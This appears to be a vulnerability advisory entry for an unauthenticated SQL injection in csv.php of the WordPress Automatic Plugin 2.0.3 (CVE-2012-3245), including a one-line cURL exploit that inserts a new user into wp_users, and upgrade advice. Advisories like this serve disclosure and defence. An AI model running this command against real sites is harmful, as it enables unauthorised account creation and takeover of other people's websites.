vendor:
Wordpress Automatic Plugin
by:
Josiah Ryan
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Wordpress Automatic Plugin
Affected Version From: 2.0.3
Affected Version To: 2.0.3
Patch Exists: Yes
Related CWE: CVE-2012-3245
CPE: a:codecanyon:wordpress_automatic_plugin:2.0.3
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: None
2012
WordPress Automatic Plugin v2.0.3 SQL Injection
The vulnerability occurs in the csv.php file which does not require valid login credentials and can be used to execute SQL Queries. Using this cURL command a user can send this POST data which will create a new login: $ curl --data q=INSERT INTO `wp_users` (`user_login`, `user_pass`, `user_email`) VALUES ('test', '123456', 'jblow@gmail.com') http://www.example.com/blog/wp-content/plugins/wp-automatic/inc/csv.php
Mitigation:
Users are urged to upgrade to the latest version of the plugin.